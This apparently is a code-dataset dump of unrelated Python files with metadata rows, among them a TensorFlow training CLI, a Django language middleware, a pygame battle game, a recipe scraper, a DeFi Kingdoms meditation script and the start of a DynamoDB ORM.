self.train_dataset = dataset.take(self.nb_train_samples)
self.train_dataset = self.train_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.train_dataset = self.train_dataset.batch(batch_size, drop_remainder=True)
self.train_dataset = self.train_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.train_dataset = self.train_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.train_dataset = self.train_dataset.repeat()
self.valid_dataset = dataset.skip(self.nb_train_samples)
self.valid_dataset = self.valid_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.valid_dataset = self.valid_dataset.batch(batch_size, drop_remainder=True)
self.valid_dataset = self.valid_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.valid_dataset = self.valid_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.valid_dataset = self.valid_dataset.repeat()
return self
def create_model(self, name):
arguments = signature(getattr(models, name).__init__)
arguments = {k: v.default for k, v in arguments.parameters.items()
if v.default is not Parameter.empty and k != 'self'}
arguments['nb_symbols'] = len(self.char2int)
arg_str = ', '.join([f'{k}=' + str(v) if type(v) != str else f'{k}=' '"' + str(v) + '"'
for k, v in arguments.items()])
# print(arg_str)
exec(dedent(f'''
def create({arg_str}):
self.model = {name}(**locals())
return self
create.__name__ = {name}.__name__
create.__doc__ = {name}.__init__.__doc__
setattr(self, create.__name__, create)
'''), {'self': self, name: getattr(models, name), arg_str: arg_str})
return getattr(self, name)
def train(self, epochs: int, monitor_metric='val_acc', patience: int = 5,
steps_per_epoch: Union[int, str] = 'auto', validation_steps: Union[int, str] = 'auto',
log_dir: str = 'logs',
use_multiprocessing: bool = False):
pprint(locals())
log_dir = Path(log_dir).joinpath(datetime.now().replace(microsecond=0).isoformat())
model_path = Path(log_dir).joinpath('checkpoints').joinpath('best-model.h5py')
model_path = str(model_path)
if steps_per_epoch == 'auto':
steps_per_epoch = self.nb_train_samples // self.batch_size
if validation_steps == 'auto':
validation_steps = self.nb_valid_samples // self.batch_size
self.model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc'])
history = self.model.fit_generator(
self.train_dataset.as_numpy_iterator(), steps_per_epoch=steps_per_epoch,
validation_data=self.valid_dataset.as_numpy_iterator(), validation_steps=validation_steps,
epochs=epochs,
use_multiprocessing=use_multiprocessing, workers=os.cpu_count() - 1,
callbacks=[
TerminateOnNaN(),
TensorBoard(log_dir=log_dir),
ModelCheckpoint(model_path, monitor=monitor_metric, verbose=1, save_best_only=True),
EarlyStopping(monitor=monitor_metric, patience=patience),
])
return history.history
if __name__ == '__main__':
cli = Gym()
fire.Fire(cli)
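Besides the Fire CLI, the Gym chain can be driven directly from Python, since each step returns self or a generated constructor; a sketch in which the corpus path and the model name 'RNN' are assumptions:
gym = Gym()
gym.construct_dataset(path='corpus.txt', locale='en', batch_size=32)
create = gym.create_model('RNN')  # returns the generated constructor
create()                          # instantiate with default arguments
history = gym.train(epochs=5)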
| 46.943089
| 118
| 0.662799
| 734
| 5,774
| 4.957766
| 0.262943
| 0.032152
| 0.057159
| 0.029678
| 0.251168
| 0.214894
| 0.185765
| 0.154438
| 0.108272
| 0.108272
| 0
| 0.010316
| 0.227745
| 5,774
| 122
| 119
| 47.327869
| 0.805786
| 0.003464
| 0
| 0.057143
| 0
| 0
| 0.08329
| 0.00939
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038095
| false
| 0
| 0.171429
| 0
| 0.257143
| 0.047619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c72d8c0b48b4984dfd1c6e64ae6bd05f864f9ea
| 1,273
|
py
|
Python
|
pybb/middleware.py
|
grigi/pybbm
|
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
|
[
"BSD-2-Clause"
] | null | null | null |
pybb/middleware.py
|
grigi/pybbm
|
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
|
[
"BSD-2-Clause"
] | null | null | null |
pybb/middleware.py
|
grigi/pybbm
|
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from django.utils import translation
from django.db.models import ObjectDoesNotExist
from pybb import util
from pybb.signals import user_saved
class PybbMiddleware(object):
def process_request(self, request):
if request.user.is_authenticated():
try:
                # Try to load the profile. This can fail if the user was
                # created during syncdb while the profile model was under
                # South control (like pybb.Profile).
profile = util.get_pybb_profile(request.user)
except ObjectDoesNotExist:
                # OK, create a new profile for this user and grant
                # permission to add posts
user_saved(request.user, created=True)
profile = util.get_pybb_profile(request.user)
language = translation.get_language_from_request(request)
if not profile.language:
profile.language = language
profile.save()
if profile.language and profile.language != language:
request.session['django_language'] = profile.language
translation.activate(profile.language)
request.LANGUAGE_CODE = translation.get_language()
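To take effect, the class would be listed in the project's middleware setting; a sketch using the old-style MIDDLEWARE_CLASSES that matches the process_request hook above:
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'pybb.middleware.PybbMiddleware',
)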
| 37.441176
| 69
| 0.624509
| 138
| 1,273
| 5.65942
| 0.456522
| 0.115237
| 0.035851
| 0.046095
| 0.09219
| 0.09219
| 0.09219
| 0
| 0
| 0
| 0
| 0.001135
| 0.307934
| 1,273
| 33
| 70
| 38.575758
| 0.885358
| 0.189317
| 0
| 0.1
| 0
| 0
| 0.014634
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.2
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c73a2fb986309ca0a2f6912149adaf74509a6fc
| 716
|
py
|
Python
|
day5.py
|
achien/advent-of-code-2021
|
8851e1727975ea8124db78b54fe577fbf2e5883d
|
[
"MIT"
] | null | null | null |
day5.py
|
achien/advent-of-code-2021
|
8851e1727975ea8124db78b54fe577fbf2e5883d
|
[
"MIT"
] | null | null | null |
day5.py
|
achien/advent-of-code-2021
|
8851e1727975ea8124db78b54fe577fbf2e5883d
|
[
"MIT"
] | null | null | null |
import fileinput
counts = {}
for line in fileinput.input():
line = line.strip()
p1, p2 = line.split('>')
p1 = p1[:-2]
x1, y1 = p1.split(',')
x1 = int(x1)
y1 = int(y1)
p2 = p2[1:]
x2, y2 = p2.split(',')
x2 = int(x2)
y2 = int(y2)
if x1 == x2:
dx = 0
elif x1 > x2:
dx = -1
else:
dx = 1
if y1 == y2:
dy = 0
elif y1 > y2:
dy = -1
else:
dy = 1
x = x1
y = y1
while True:
pt = (x, y)
counts[pt] = counts.get(pt, 0) + 1
if x == x2 and y == y2:
break
x += dx
y += dy
n = 0
for _, ct in counts.items():
if ct > 1:
n += 1
print(n)
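The parser above expects one segment per line in the form "x1,y1 -> x2,y2" (Advent of Code 2021, day 5); for example:
0,9 -> 5,9
8,0 -> 0,8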
| 15.911111
| 42
| 0.391061
| 108
| 716
| 2.583333
| 0.333333
| 0.028674
| 0.043011
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114796
| 0.452514
| 716
| 45
| 43
| 15.911111
| 0.596939
| 0
| 0
| 0.051282
| 0
| 0
| 0.004184
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025641
| 0
| 0.025641
| 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c73c6bd43cad4b6997238ea62e6e2c529f20e54
| 1,635
|
py
|
Python
|
meditation_example.py
|
sodapopinsky/dfk
|
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
|
[
"MIT"
] | 90
|
2021-10-17T19:36:45.000Z
|
2022-03-31T17:19:43.000Z
|
meditation_example.py
|
sodapopinsky/dfk
|
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
|
[
"MIT"
] | 13
|
2021-11-13T00:19:31.000Z
|
2022-03-20T15:13:22.000Z
|
meditation_example.py
|
sodapopinsky/dfk
|
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
|
[
"MIT"
] | 71
|
2021-11-05T03:00:41.000Z
|
2022-03-30T06:16:25.000Z
|
import logging
from web3 import Web3
import sys
import time
import meditation.meditation as meditation
if __name__ == "__main__":
log_format = '%(asctime)s|%(name)s|%(levelname)s: %(message)s'
logger = logging.getLogger("DFK-meditation")
logger.setLevel(logging.DEBUG)
logging.basicConfig(level=logging.INFO, format=log_format, stream=sys.stdout)
rpc_server = 'https://api.harmony.one'
logger.info("Using RPC server " + rpc_server)
private_key = None # set private key
account_address = '0x2E7669F61eA77F02445A015FBdcFe2DE47083E02'
gas_price_gwei = 10
tx_timeout_seconds = 30
w3 = Web3(Web3.HTTPProvider(rpc_server))
active_meditations = meditation.get_active_meditations(account_address, rpc_server)
logger.info("Pending meditation on address " + str(account_address) + ": "+str(active_meditations))
level = 1
hero_id = 1
required_runes = meditation.get_required_runes(level, rpc_server)
meditation.start_meditation(1, meditation.stat2id('strength'), meditation.stat2id('endurance'), meditation.stat2id('luck'),
meditation.ZERO_ADDRESS, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
hero_meditation = meditation.get_hero_meditation(hero_id, rpc_server)
logger.info("Pending meditation "+str(hero_meditation))
time.sleep(5)
meditation.complete_meditation(hero_id, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
| 41.923077
| 127
| 0.720489
| 193
| 1,635
| 5.818653
| 0.378238
| 0.072128
| 0.053428
| 0.033838
| 0.22618
| 0.22618
| 0.162066
| 0.162066
| 0.162066
| 0.162066
| 0
| 0.03286
| 0.18104
| 1,635
| 38
| 128
| 43.026316
| 0.805825
| 0.009174
| 0
| 0.066667
| 0
| 0
| 0.13791
| 0.047619
| 0
| 0
| 0.025974
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c76367fcd11568b786d20b9e43e17b970ff6e48
| 2,329
|
py
|
Python
|
servers/python/coweb/bot/wrapper/object.py
|
opencoweb/coweb
|
7b3a87ee9eda735a859447d404ee16edde1c5671
|
[
"AFL-2.1"
] | 83
|
2015-01-05T19:02:57.000Z
|
2021-11-19T02:48:09.000Z
|
servers/python/coweb/bot/wrapper/object.py
|
xuelingxiao/coweb
|
7b3a87ee9eda735a859447d404ee16edde1c5671
|
[
"AFL-2.1"
] | 3
|
2015-12-16T13:49:33.000Z
|
2019-06-17T13:38:50.000Z
|
servers/python/coweb/bot/wrapper/object.py
|
xuelingxiao/coweb
|
7b3a87ee9eda735a859447d404ee16edde1c5671
|
[
"AFL-2.1"
] | 14
|
2015-04-29T22:36:53.000Z
|
2021-11-18T03:24:29.000Z
|
'''
Copyright (c) The Dojo Foundation 2011. All Rights Reserved.
Copyright (c) IBM Corporation 2008, 2011. All Rights Reserved.
'''
# tornado
import tornado.ioloop
# std lib
import logging
import time
import weakref
import functools
# coweb
from .base import BotWrapperBase
log = logging.getLogger('coweb.bot')
class ObjectBotWrapper(BotWrapperBase):
def __init__(self, manager, botClass, serviceName, serviceToken, appData):
self.serviceName = serviceName
self.appData = appData
self._serviceToken = serviceToken
self._manager = weakref.proxy(manager)
self._bot = botClass(self, serviceName, appData)
self._ioLoop = tornado.ioloop.IOLoop.instance()
# asynchronously inform local manager we're ready
self.add_callback(self._manager.on_bot_ready,
serviceName, serviceToken, self)
def on_message(self, mtdName, *args):
'''Proxy messages from manager to bot impl.'''
try:
mtd = getattr(self._bot, mtdName)
except AttributeError:
# bot isn't listening for this message type
return
# keep sync with manager so we can catch exceptions, else exception
# fires in context of original request which is wrong, it's a bot
# error not a client error
try:
mtd(*args)
except Exception:
log.exception('bot error')
def reply(self, replyToken, data):
'''Sends a private reply to a requestor.'''
self._manager.on_bot_response(self.serviceName, replyToken, data)
def publish(self, data):
'''Sends a public reply to subscribes on a bot subchannel.'''
self._manager.on_bot_publish(self.serviceName, data)
def add_callback(self, callback, *args, **kwargs):
'''Schedule a callback in the main loop.'''
f = functools.partial(callback, *args, **kwargs)
self._ioLoop.add_callback(f)
def add_timer(self, delay, callback, *args, **kwargs):
'''Add a one-shot timer that schedules a main loop callback.'''
f = functools.partial(callback, *args, **kwargs)
return self._ioLoop.add_timeout(time.time() + delay, f)
def remove_timer(self, timer):
'''Remove a one-shot timer.'''
self._ioLoop.remove_timeout(timer)
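A bot implementation consumed by this wrapper only needs the constructor signature used in __init__ above; handlers are looked up by name in on_message, so the handler shown here ('on_request' and its argument list) is a hypothetical sketch:
class EchoBot:
    def __init__(self, wrapper, serviceName, appData):
        self.wrapper = wrapper

    def on_request(self, data, replyToken, username):  # hypothetical handler
        # send the request data straight back to the requestor
        self.wrapper.reply(replyToken, data)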
| 35.287879
| 78
| 0.653499
| 282
| 2,329
| 5.294326
| 0.411348
| 0.036839
| 0.048225
| 0.03215
| 0.046885
| 0.046885
| 0
| 0
| 0
| 0
| 0
| 0.006861
| 0.249034
| 2,329
| 65
| 79
| 35.830769
| 0.84677
| 0.278231
| 0
| 0.105263
| 0
| 0
| 0.011002
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.184211
| false
| 0
| 0.157895
| 0
| 0.421053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c76baa8499aec4813a3d47e851bd3cbe62268bf
| 6,193
|
py
|
Python
|
battle_tut5.py
|
lankotiAditya/RPG_battle_main
|
0063941d023ff1c18a6b050fab4d0c7ec583b11a
|
[
"MIT"
] | 22
|
2021-01-13T10:21:42.000Z
|
2022-03-10T00:06:05.000Z
|
battle_tut5.py
|
lankotiAditya/RPG_battle_main
|
0063941d023ff1c18a6b050fab4d0c7ec583b11a
|
[
"MIT"
] | 1
|
2021-01-14T17:02:41.000Z
|
2021-01-14T20:23:38.000Z
|
battle_tut5.py
|
lankotiAditya/RPG_battle_main
|
0063941d023ff1c18a6b050fab4d0c7ec583b11a
|
[
"MIT"
] | 33
|
2021-01-17T08:52:38.000Z
|
2022-03-28T10:36:36.000Z
|
import pygame
import random
pygame.init()
clock = pygame.time.Clock()
fps = 60
#game window
bottom_panel = 150
screen_width = 800
screen_height = 400 + bottom_panel
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption('Battle')
#define game variables
current_fighter = 1
total_fighters = 3
action_cooldown = 0
action_wait_time = 90
attack = False
potion = False
clicked = False
#define fonts
font = pygame.font.SysFont('Times New Roman', 26)
#define colours
red = (255, 0, 0)
green = (0, 255, 0)
#load images
#background image
background_img = pygame.image.load('img/Background/background.png').convert_alpha()
#panel image
panel_img = pygame.image.load('img/Icons/panel.png').convert_alpha()
#sword image
sword_img = pygame.image.load('img/Icons/sword.png').convert_alpha()
#create function for drawing text
def draw_text(text, font, text_col, x, y):
img = font.render(text, True, text_col)
screen.blit(img, (x, y))
#function for drawing background
def draw_bg():
screen.blit(background_img, (0, 0))
#function for drawing panel
def draw_panel():
#draw panel rectangle
screen.blit(panel_img, (0, screen_height - bottom_panel))
#show knight stats
draw_text(f'{knight.name} HP: {knight.hp}', font, red, 100, screen_height - bottom_panel + 10)
for count, i in enumerate(bandit_list):
#show name and health
draw_text(f'{i.name} HP: {i.hp}', font, red, 550, (screen_height - bottom_panel + 10) + count * 60)
#fighter class
class Fighter():
def __init__(self, x, y, name, max_hp, strength, potions):
self.name = name
self.max_hp = max_hp
self.hp = max_hp
self.strength = strength
self.start_potions = potions
self.potions = potions
self.alive = True
self.animation_list = []
self.frame_index = 0
        self.action = 0  # 0:idle, 1:attack, 2:hurt, 3:dead
self.update_time = pygame.time.get_ticks()
#load idle images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Idle/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
#load attack images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Attack/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
self.image = self.animation_list[self.action][self.frame_index]
self.rect = self.image.get_rect()
self.rect.center = (x, y)
def update(self):
animation_cooldown = 100
#handle animation
#update image
self.image = self.animation_list[self.action][self.frame_index]
#check if enough time has passed since the last update
if pygame.time.get_ticks() - self.update_time > animation_cooldown:
self.update_time = pygame.time.get_ticks()
self.frame_index += 1
#if the animation has run out then reset back to the start
if self.frame_index >= len(self.animation_list[self.action]):
self.idle()
def idle(self):
        #set variables to idle animation
self.action = 0
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def attack(self, target):
#deal damage to enemy
rand = random.randint(-5, 5)
damage = self.strength + rand
target.hp -= damage
#check if target has died
if target.hp < 1:
target.hp = 0
target.alive = False
#set variables to attack animation
self.action = 1
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def draw(self):
screen.blit(self.image, self.rect)
class HealthBar():
def __init__(self, x, y, hp, max_hp):
self.x = x
self.y = y
self.hp = hp
self.max_hp = max_hp
def draw(self, hp):
#update with new health
self.hp = hp
#calculate health ratio
ratio = self.hp / self.max_hp
pygame.draw.rect(screen, red, (self.x, self.y, 150, 20))
pygame.draw.rect(screen, green, (self.x, self.y, 150 * ratio, 20))
knight = Fighter(200, 260, 'Knight', 30, 10, 3)
bandit1 = Fighter(550, 270, 'Bandit', 20, 6, 1)
bandit2 = Fighter(700, 270, 'Bandit', 20, 6, 1)
bandit_list = []
bandit_list.append(bandit1)
bandit_list.append(bandit2)
knight_health_bar = HealthBar(100, screen_height - bottom_panel + 40, knight.hp, knight.max_hp)
bandit1_health_bar = HealthBar(550, screen_height - bottom_panel + 40, bandit1.hp, bandit1.max_hp)
bandit2_health_bar = HealthBar(550, screen_height - bottom_panel + 100, bandit2.hp, bandit2.max_hp)
run = True
while run:
clock.tick(fps)
#draw background
draw_bg()
#draw panel
draw_panel()
knight_health_bar.draw(knight.hp)
bandit1_health_bar.draw(bandit1.hp)
bandit2_health_bar.draw(bandit2.hp)
#draw fighters
knight.update()
knight.draw()
for bandit in bandit_list:
bandit.update()
bandit.draw()
#control player actions
#reset action variables
attack = False
potion = False
target = None
#make sure mouse is visible
pygame.mouse.set_visible(True)
pos = pygame.mouse.get_pos()
for count, bandit in enumerate(bandit_list):
if bandit.rect.collidepoint(pos):
#hide mouse
pygame.mouse.set_visible(False)
#show sword in place of mouse cursor
screen.blit(sword_img, pos)
if clicked == True:
attack = True
target = bandit_list[count]
#player action
if knight.alive == True:
if current_fighter == 1:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#look for player action
#attack
if attack == True and target != None:
knight.attack(target)
current_fighter += 1
action_cooldown = 0
#enemy action
for count, bandit in enumerate(bandit_list):
if current_fighter == 2 + count:
if bandit.alive == True:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#attack
bandit.attack(knight)
current_fighter += 1
action_cooldown = 0
else:
current_fighter += 1
#if all fighters have had a turn then reset
if current_fighter > total_fighters:
current_fighter = 1
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
else:
clicked = False
pygame.display.update()
pygame.quit()
| 23.911197
| 101
| 0.707089
| 947
| 6,193
| 4.476241
| 0.195354
| 0.012975
| 0.023119
| 0.032555
| 0.313281
| 0.248879
| 0.215145
| 0.181647
| 0.14343
| 0.122199
| 0
| 0.028878
| 0.172453
| 6,193
| 258
| 102
| 24.003876
| 0.798244
| 0.141773
| 0
| 0.295597
| 0
| 0
| 0.040212
| 0.016502
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062893
| false
| 0
| 0.012579
| 0
| 0.08805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c791be103564830f1d4250200840c0dccc964ac
| 651
|
py
|
Python
|
curso_em_video/0087a.py
|
marinaoliveira96/python-exercises
|
13fc0ec30dec9bb6531cdeb41c80726971975835
|
[
"MIT"
] | null | null | null |
curso_em_video/0087a.py
|
marinaoliveira96/python-exercises
|
13fc0ec30dec9bb6531cdeb41c80726971975835
|
[
"MIT"
] | null | null | null |
curso_em_video/0087a.py
|
marinaoliveira96/python-exercises
|
13fc0ec30dec9bb6531cdeb41c80726971975835
|
[
"MIT"
] | null | null | null |
matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
soma = col3 = maior = 0
for l in range(0, 3):
for c in range(0, 3):
matriz[l][c] = int(input(f'[{l}][{c}]: '))
for l in range(0, 3):
for c in range(0, 3):
print(f'[{matriz[l][c]:^5}]', end='')
if matriz[l][c] % 2 == 0:
soma += matriz[l][c]
print()
for l in range(0, 3):
col3 += matriz[l][2]
for c in range(0, 3):
if c == 0:
maior = matriz[1][c]
elif matriz[1][c] > maior:
maior = matriz[1][c]
print(f'The sum of the even numbers is {soma}')
print(f'The sum of the values in the 3rd column is {col3}')
print(f'The largest number in the 2nd row is {maior}')
| 31
| 50
| 0.506912
| 126
| 651
| 2.619048
| 0.253968
| 0.048485
| 0.063636
| 0.072727
| 0.348485
| 0.263636
| 0.184848
| 0.184848
| 0.157576
| 0.157576
| 0
| 0.07431
| 0.276498
| 651
| 21
| 51
| 31
| 0.626327
| 0
| 0
| 0.380952
| 0
| 0
| 0.211656
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.238095
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c79db5803090229f5cee46e595e5f692bd63c32
| 1,652
|
py
|
Python
|
camd3/infrastructure/component/tests/test_uidattr.py
|
mamrhein/CAmD3
|
d20f62295771a297c3fbb314beef314e5ec7a2b5
|
[
"BSD-2-Clause"
] | null | null | null |
camd3/infrastructure/component/tests/test_uidattr.py
|
mamrhein/CAmD3
|
d20f62295771a297c3fbb314beef314e5ec7a2b5
|
[
"BSD-2-Clause"
] | null | null | null |
camd3/infrastructure/component/tests/test_uidattr.py
|
mamrhein/CAmD3
|
d20f62295771a297c3fbb314beef314e5ec7a2b5
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Name: test_uidattr
# Purpose: Test driver for module 'uidattr'
#
# Author: Michael Amrhein (michael@adrhinum.de)
#
# Copyright: (c) 2018 Michael Amrhein
# ----------------------------------------------------------------------------
# $Source$
# $Revision$
"""Test driver for module 'uidattr'"""
import unittest
from uuid import uuid1
from camd3.infrastructure.component import (
Component, register_utility, UniqueIdAttribute)
from camd3.infrastructure.component.idfactories import (
UUIDGenerator, uuid_generator)
# factory for UUIDs
def custom_uuid_generator() -> UUIDGenerator: # noqa: D103
while True:
yield uuid1()
class ExplID(Component):
id = UniqueIdAttribute(uid_gen=custom_uuid_generator())
def __init__(self):
self.__class__.id.set_once(self)
class ImplID(Component):
id = UniqueIdAttribute()
def __init__(self):
self.__class__.id.set_once(self)
class UniqueIdAttributeTest(unittest.TestCase):
def setUp(self):
register_utility(uuid_generator(), UUIDGenerator)
self.cid = ImplID()
def test_init(self):
cid = ImplID()
self.assertIsNotNone(cid.id)
self.assertIsNotNone(cid._id)
def test_uniqueness(self):
ids = {self.cid.id}
for i in range(10):
cid = ExplID()
self.assertNotIn(cid.id, ids)
ids.add(cid.id)
if __name__ == '__main__': # pragma: no cover
unittest.main()
| 23.6
| 78
| 0.578087
| 166
| 1,652
| 5.518072
| 0.451807
| 0.027293
| 0.028384
| 0.041485
| 0.139738
| 0.082969
| 0.082969
| 0.082969
| 0.082969
| 0.082969
| 0
| 0.011792
| 0.230024
| 1,652
| 69
| 79
| 23.942029
| 0.708333
| 0.276634
| 0
| 0.121212
| 0
| 0
| 0.006809
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.181818
| false
| 0
| 0.121212
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c7a9873c160d856f0a448855b2b79215e8191fc
| 883
|
py
|
Python
|
s.py
|
tn012604409/HW3_chatRobot
|
97762e53bfccd8b30c6b263792919c679e53b404
|
[
"MIT"
] | null | null | null |
s.py
|
tn012604409/HW3_chatRobot
|
97762e53bfccd8b30c6b263792919c679e53b404
|
[
"MIT"
] | null | null | null |
s.py
|
tn012604409/HW3_chatRobot
|
97762e53bfccd8b30c6b263792919c679e53b404
|
[
"MIT"
] | null | null | null |
import requests
import time
from bs4 import BeautifulSoup
def get_web_page(url):
resp = requests.get(
url=url,
)
if resp.status_code != 200:
print('Invalid url:', resp.url)
return None
else:
return resp.text
def get_articles(dom):
soup = BeautifulSoup(dom, 'html.parser')
    tag = soup.find_all('a', 'recipe-name')
    articles = tag
    return articles
def run():
page = get_web_page('https://icook.tw/recipes/popular?ref=icook-footer')
if page:
current_articles = get_articles(page)
        i = 1
        s = ''
        for post in current_articles:
            temp = str(post)
            num = int(temp.find("\" href="))
            #print('The Number {0}: {1}'.format(i, temp[35:num]))
            s = s + 'The Number {0}: {1}\n'.format(i, temp[35:num])
            i = i + 1
return s
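A minimal driver (live network access to icook.tw assumed):
if __name__ == '__main__':
    print(run())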
| 22.641026
| 76
| 0.551529
| 118
| 883
| 4.042373
| 0.5
| 0.025157
| 0.041929
| 0.046122
| 0.067086
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023102
| 0.313703
| 883
| 38
| 77
| 23.236842
| 0.764026
| 0.05889
| 0
| 0
| 0
| 0
| 0.127711
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.103448
| 0
| 0.344828
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c7abb53711251283db1d2b1869388b7608f3858
| 21,493
|
py
|
Python
|
awstin/dynamodb/orm.py
|
k2bd/awstin
|
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
|
[
"MIT"
] | 1
|
2020-12-29T20:49:27.000Z
|
2020-12-29T20:49:27.000Z
|
awstin/dynamodb/orm.py
|
k2bd/awstin
|
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
|
[
"MIT"
] | 69
|
2020-11-16T21:16:44.000Z
|
2021-04-14T17:16:33.000Z
|
awstin/dynamodb/orm.py
|
k2bd/awstin
|
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
|
[
"MIT"
] | null | null | null |
import uuid
from abc import ABC, abstractmethod
from collections import defaultdict
from typing import Union
from boto3.dynamodb.conditions import Attr as BotoAttr
from boto3.dynamodb.conditions import Key as BotoKey
from awstin.dynamodb.utils import from_decimal, to_decimal
class NotSet:
"""
A value of an attribute on a data model is not present in a DynamoDB result
"""
def __str__(self):
return "<<Attribute not set>>"
def __repr__(self):
return "<<Attribute not set>>"
NOT_SET = NotSet()
class BaseAttribute:
def __init__(self, attribute_name: Union[str, None] = None):
"""
Parameters
----------
attribute_name : str, optional
Name of the property in the DynamoDB table. Defaults to the name of
the attribute on the DynamoModel class.
"""
# Set by user
self._attribute_name = attribute_name
# Set by Model
self._name_on_model = None
@property
def _awstin_name(self):
if self._attribute_name is not None:
return self._attribute_name
else:
return self._name_on_model
def __getattr__(self, name):
"""
Support for nested mapping queries
"""
try:
